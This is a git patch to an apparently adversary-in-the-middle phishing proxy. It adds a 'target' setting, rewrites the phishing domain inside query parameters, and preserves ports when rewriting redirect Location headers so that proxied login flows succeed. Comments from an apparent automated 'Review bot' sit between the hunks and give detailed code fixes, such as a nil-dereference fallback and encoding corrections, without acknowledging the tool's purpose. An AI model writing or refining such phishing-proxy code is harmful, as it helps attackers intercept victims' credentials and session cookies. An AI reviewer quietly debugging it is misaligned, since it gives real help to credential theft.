From a4e4153a736c482249d46b3473328910f9377d74 Mon Sep 17 00:00:00 2001 From: ziggoon Date: Thu, 19 Sep 2024 09:26:30 -0500 Subject: [PATCH 1/2] wee woo requests not being modified properly --- core/banner.go | 2 ++ core/config.go | 12 ++++++++ core/http_proxy.go | 70 ++++++++++++++++++++++++++++++++++++++-------- core/terminal.go | 7 +++-- 4 files changed, 77 insertions(+), 14 deletions(-) diff --git a/core/banner.go b/core/banner.go index d71ae070d..680ad479c 100644 --- a/core/banner.go +++ b/core/banner.go @@ -111,4 +111,6 @@ func Banner() { fmt.Println() putAsciiArt("__ __\n") fmt.Println() + fmt.Println(" meow @ziggoon") + fmt.Println() } diff --git a/core/config.go b/core/config.go index 7404a824a..f858c7338 100644 --- a/core/config.go +++ b/core/config.go @@ -74,6 +74,7 @@ type GeneralConfig struct { HttpsPort int `mapstructure:"https_port" json:"https_port" yaml:"https_port"` DnsPort int `mapstructure:"dns_port" json:"dns_port" yaml:"dns_port"` Autocert bool `mapstructure:"autocert" json:"autocert" yaml:"autocert"` + Target string `mapstructure:"target" json:"target" yaml:"target"` } type Config struct { @@ -496,6 +497,17 @@ func (c *Config) EnableAutocert(enabled bool) { c.cfg.WriteConfig() } +func (c *Config) SetTarget(target string) { + c.general.Target = target + c.cfg.Set(CFG_GENERAL, c.general) + log.Info("target set to: %s", target) + c.cfg.WriteConfig() +} + +func (c *Config) GetTarget() string { + return c.general.Target +} + func (c *Config) refreshActiveHostnames() { c.activeHostnames = []string{} sites := c.GetEnabledSites() diff --git a/core/http_proxy.go b/core/http_proxy.go index 88a024709..9cc9c1448 100644 --- a/core/http_proxy.go +++ b/core/http_proxy.go @@ -647,6 +647,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da if len(qs) > 0 { for gp := range qs { for i, v := range qs[gp] { + v = p.replacePhishingDomainInValue(v) qs[gp][i] = string(p.patchUrls(pl, []byte(v), CONVERT_TO_ORIGINAL_URLS)) } } 
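Review bot: `SetTarget` and `GetTarget` in core/config.go are exported without doc comments, and nothing in the patch says what form `Target` takes (a bare host name, or a URL with a scheme). The only consumer visible in this patch, `replacePhishingDomainInValue` in core/http_proxy.go, splices the value textually in place of `general.Domain`, and the `case "target"` branch in core/terminal.go passes `args[1]` through unchecked, so a typo or a value carrying a scheme or trailing slash is persisted and then written into query values as-is. I would add `// SetTarget stores the host name substituted for the base domain in rewritten query values and writes it to the config file.` above the setter and reject input that does not parse as a host name before calling `c.cfg.Set`. The result of `c.cfg.WriteConfig()` is also dropped here, as it is in `EnableAutocert` just above.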
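Review bot: The added `v = p.replacePhishingDomainInValue(v)` in the `@@ -647` hunk applies one global `Domain` to `Target` substitution to every query value, although the configuration is otherwise per phishlet (see the `p.cfg.phishlets` loop and `GetSiteDomain` call in `replaceHostWithPhished`). The helper, defined in the last hunk of this file, uses `strings.Replace(..., -1)` with no host-boundary check, so the domain string is also rewritten where it is only a substring of a longer name or of unrelated text. It reads `p.cfg.general.Domain` and `p.cfg.general.Target` directly even though this commit adds `GetTarget()`, and it has no comment; `// replacePhishingDomainInValue replaces every occurrence of the configured base domain in value with the configured target; value is returned unchanged when either setting is empty.` would document what it does today. The enclosing query loop starts and ends outside this hunk.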
@@ -935,10 +936,15 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da // if "Location" header is present, make sure to redirect to the phishing domain r_url, err := resp.Location() if err == nil { - if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok { - r_url.Host = r_host - resp.Header.Set("Location", r_url.String()) - } + // log.Debug("Original Location header: %s", r_url.String()) + if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok { + r_url.Host = r_host + new_location := r_url.String() + resp.Header.Set("Location", new_location) + // log.Info("Updated Location header: %s", new_location) + } else { + log.Warning("Failed to replace host in Location header: %s", r_url.String()) + } } // fix cookies @@ -1508,17 +1514,35 @@ func (p *HttpProxy) patchUrls(pl *Phishlet, body []byte, c_type int) []byte { if err == nil { for _, h := range hosts { if strings.ToLower(u.Host) == h { - s_url = strings.Replace(s_url, u.Host, sub_map[h], 1) + u.Host = sub_map[h] break } } + // Check and replace in query parameters + q := u.Query() + for key, values := range q { + for _, value := range values { + decodedValue, err := url.QueryUnescape(value) + if err == nil { + for _, h := range hosts { + if strings.Contains(decodedValue, h) { + decodedValue = strings.Replace(decodedValue, h, sub_map[h], -1) + q.Set(key, url.QueryEscape(decodedValue)) + break + } + } + } + } + } + u.RawQuery = q.Encode() } - return s_url + return u.String() })) + body = []byte(re_ns_url.ReplaceAllStringFunc(string(body), func(s_url string) string { for _, h := range hosts { if strings.Contains(s_url, h) && !strings.Contains(s_url, sub_map[h]) { - s_url = strings.Replace(s_url, h, sub_map[h], 1) + s_url = strings.Replace(s_url, h, sub_map[h], -1) break } } 
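Review bot: The new `else` branch in the `@@ -935` hunk logs at warning level whenever the `Location` host is not one that `replaceHostWithPhished` maps, which presumably includes every ordinary redirect to a host outside the proxied set, so normal traffic fills the log with warnings. It also prints `r_url.String()`, the full redirect URL with its query string, and redirect URLs often carry one-time codes or tokens that should not be written to log files. I would log only the host at debug level, `log.Debug("Location host not rewritten: %s", r_url.Host)`, and delete the two commented-out log lines rather than commit them. The surrounding response handler starts and ends outside this hunk.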
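Review bot: In the `@@ -1508` hunk `return u.String()` now sits outside the `if err == nil` block, so when parsing failed the callback dereferences `u`, which is presumably the nil `*url.URL` from a `url.Parse` call just above the hunk; the old code returned `s_url` untouched in that case. Restore the fallback with `if err != nil { return s_url }` before the host loop. In the query loop, `u.Query()` already returns decoded values and `q.Encode()` re-encodes them, so the extra `url.QueryUnescape`/`url.QueryEscape` pair decodes and encodes twice (a literal `+` or `%` in a value is corrupted), and `q.Set(key, ...)` collapses a multi-valued key to the single value being edited. Because `u.RawQuery = q.Encode()` runs unconditionally, every matched URL also has its parameters re-sorted and re-escaped even when nothing was replaced; assigning it only after a replacement keeps untouched URLs byte-identical. The regexp and the parse call are outside the hunk.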
@@ -1729,6 +1753,13 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) { prefix = "." hostname = hostname[1:] } + + host, port, err := net.SplitHostPort(hostname) + if err != nil { + host = hostname + port = "" + } + for site, pl := range p.cfg.phishlets { if p.cfg.IsSiteEnabled(site) { phishDomain, ok := p.cfg.GetSiteDomain(pl.Name) @@ -1736,11 +1767,19 @@ func (p *HttpProxy) replaceHostWithPhished(hostname string) (string, bool) { continue } for _, ph := range pl.proxyHosts { - if hostname == combineHost(ph.orig_subdomain, ph.domain) { - return prefix + combineHost(ph.phish_subdomain, phishDomain), true + if host == combineHost(ph.orig_subdomain, ph.domain) { + phishedHost := combineHost(ph.phish_subdomain, phishDomain) + if port != "" { + phishedHost = net.JoinHostPort(phishedHost, port) + } + return prefix + phishedHost, true } - if hostname == ph.domain { - return prefix + phishDomain, true + if host == ph.domain { + phishedHost := phishDomain + if port != "" { + phishedHost = net.JoinHostPort(phishedHost, port) + } + return prefix + phishedHost, true } } } @@ -1966,7 +2005,7 @@ func (dumb dumbResponseWriter) Hijack() (net.Conn, *bufio.ReadWriter, error) { func orPanic(err error) { if err != nil { panic(err) - } + } } func getContentType(path string, data []byte) string { @@ -1987,3 +2026,10 @@ func getSessionCookieName(pl_name string, cookie_name string) string { s_hash = s_hash[:4] + "-" + s_hash[4:] return s_hash } + +func (p *HttpProxy) replacePhishingDomainInValue(value string) string { + if p.cfg.general.Domain != "" && p.cfg.general.Target != "" { + return strings.Replace(value, p.cfg.general.Domain, p.cfg.general.Target, -1) + } + return value +} diff --git a/core/terminal.go b/core/terminal.go index b1ae75b2f..387add72f 100644 --- a/core/terminal.go +++ b/core/terminal.go 
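Review bot: The port re-attachment in `replaceHostWithPhished` is written out twice, once per match branch, and `port = ""` in the error path is redundant because `net.SplitHostPort` already returns empty strings alongside a non-nil error. Computing the replaced host in each branch and re-attaching the port in one place would keep the two branches from drifting, for example a local `withPort := func(h string) string { if port != "" { return net.JoinHostPort(h, port) }; return h }` followed by `return prefix + withPort(phishDomain), true`. A doc comment stating that the input may carry a leading dot and an optional `:port`, both preserved in the result, would record the contract this change introduces. The function's signature appears only in the hunk header and its tail is outside the hunk.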
@@ -192,8 +192,8 @@ func (t *Terminal) handleConfig(args []string) error { gophishInsecure = "true" } - keys := []string{"domain", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure"} - vals := []string{t.cfg.general.Domain, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure} + keys := []string{"domain", "target", "external_ipv4", "bind_ipv4", "https_port", "dns_port", "unauth_url", "autocert", "gophish admin_url", "gophish api_key", "gophish insecure"} + vals := []string{t.cfg.general.Domain, t.cfg.general.Target, t.cfg.general.ExternalIpv4, t.cfg.general.BindIpv4, strconv.Itoa(t.cfg.general.HttpsPort), strconv.Itoa(t.cfg.general.DnsPort), t.cfg.general.UnauthUrl, autocertOnOff, t.cfg.GetGoPhishAdminUrl(), t.cfg.GetGoPhishApiKey(), gophishInsecure} log.Printf("\n%s\n", AsRows(keys, vals)) return nil } else if pn == 2 { @@ -203,6 +203,9 @@ func (t *Terminal) handleConfig(args []string) error { t.cfg.ResetAllSites() t.manageCertificates(false) return nil + case "target": + t.cfg.SetTarget(args[1]) + return nil case "ipv4": t.cfg.SetServerExternalIP(args[1]) return nil From 0af9d2ed0bd6fdc22a6d57c04bc57ad4b1050250 Mon Sep 17 00:00:00 2001 From: ziggoon <79215783+ziggoon@users.noreply.github.com> Date: Fri, 20 Sep 2024 11:31:15 -0500 Subject: [PATCH 2/2] Update banner.go --- core/banner.go | 2 -- 1 file changed, 2 deletions(-) diff --git a/core/banner.go b/core/banner.go index 680ad479c..d71ae070d 100644 --- a/core/banner.go +++ b/core/banner.go @@ -111,6 +111,4 @@ func Banner() { fmt.Println() putAsciiArt("__ __\n") fmt.Println() - fmt.Println(" meow @ziggoon") - fmt.Println() }